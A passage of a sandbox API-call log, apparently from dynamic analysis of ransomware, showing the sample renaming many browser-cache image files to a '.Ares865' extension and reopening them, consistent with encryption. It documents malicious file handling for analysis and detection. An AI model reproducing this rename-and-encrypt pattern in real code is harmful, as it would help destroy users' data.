Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0g7a[1].jpg.Ares865") returned 117 [0096.008] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0g7a[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0g7a[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0g7a[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0g7a[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.009] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0g7a[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0g7a[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.009] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8206) returned 1 [0096.013] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0w1b[1].jpg.Ares865") returned 117 [0096.013] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0w1b[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0w1b[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0w1b[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0w1b[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.014] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0w1b[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0w1b[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.014] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7627) returned 1 [0096.017] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0xLt[1].jpg.Ares865") returned 117 [0096.017] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0xLt[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0xlt[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0xLt[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0xlt[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.018] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBC0xLt[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbc0xlt[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.019] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9146) returned 1 [0096.022] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBDWA22[1].jpg.Ares865") returned 117 [0096.022] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBDWA22[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbdwa22[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBDWA22[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbdwa22[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.023] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBDWA22[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbdwa22[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.023] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2904) returned 1 [0096.027] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBE7d3b[1].jpg.Ares865") returned 117 [0096.027] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBE7d3b[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbe7d3b[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBE7d3b[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbe7d3b[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.028] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBE7d3b[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbe7d3b[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.028] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2333) returned 1 [0096.031] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBE85ld[1].jpg.Ares865") returned 117 [0096.032] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBE85ld[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbe85ld[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBE85ld[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbe85ld[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.032] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBE85ld[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbe85ld[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.033] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10320) returned 1 [0096.036] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdckp[1].jpg.Ares865") returned 117 [0096.036] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdckp[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedckp[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdckp[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedckp[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.037] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdckp[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedckp[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.038] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5834) returned 1 [0096.041] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdMci[1].jpg.Ares865") returned 117 [0096.041] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdMci[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedmci[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdMci[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedmci[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.042] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdMci[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedmci[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.042] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2814) returned 1 [0096.046] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdSLV[1].jpg.Ares865") returned 117 [0096.046] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdSLV[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedslv[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdSLV[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedslv[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.047] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEdSLV[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbedslv[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.047] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10824) returned 1 [0096.050] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe2Pd[1].jpg.Ares865") returned 117 [0096.050] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe2Pd[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee2pd[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe2Pd[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee2pd[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.051] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe2Pd[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee2pd[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.052] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2175) returned 1 [0096.055] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe4Oo[1].png.Ares865") returned 117 [0096.055] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe4Oo[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee4oo[1].png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe4Oo[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee4oo[1].png.ares865"), dwFlags=0x1) returned 1 [0096.056] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe4Oo[1].png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee4oo[1].png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.056] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16303) returned 1 [0096.059] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe6Ew[1].jpg.Ares865") returned 117 [0096.059] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe6Ew[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee6ew[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe6Ew[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee6ew[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.061] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEe6Ew[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbee6ew[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.061] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2729) returned 1 [0096.064] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeFp3[1].jpg.Ares865") returned 117 [0096.064] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeFp3[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeefp3[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeFp3[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeefp3[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.066] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeFp3[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeefp3[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.066] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7462) returned 1 [0096.072] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeGwU[1].jpg.Ares865") returned 117 [0096.072] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeGwU[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeegwu[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeGwU[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeegwu[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.073] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeGwU[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeegwu[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.073] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1920) returned 1 [0096.076] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeUg0[1].jpg.Ares865") returned 117 [0096.076] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeUg0[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeeug0[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeUg0[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeeug0[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.077] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeUg0[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeeug0[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.078] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1982) returned 1 [0096.081] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeZnr[1].jpg.Ares865") returned 117 [0096.081] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeZnr[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeeznr[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeZnr[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeeznr[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.082] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEeZnr[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbeeznr[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.082] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14890) returned 1 [0096.086] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEf5Lq[1].jpg.Ares865") returned 117 [0096.086] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEf5Lq[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbef5lq[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEf5Lq[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbef5lq[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.087] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEf5Lq[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbef5lq[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0096.087] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12150) returned 1 [0096.090] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEfwtU[1].jpg.Ares865") returned 117 [0096.090] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEfwtU[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbefwtu[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\ABV8L7MY\\BBEfwtU[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\abv8l7my\\bbefwtu[1].jpg.ares865"), dwFlags=0x1) returned 1 [0096.091] CreateFileW 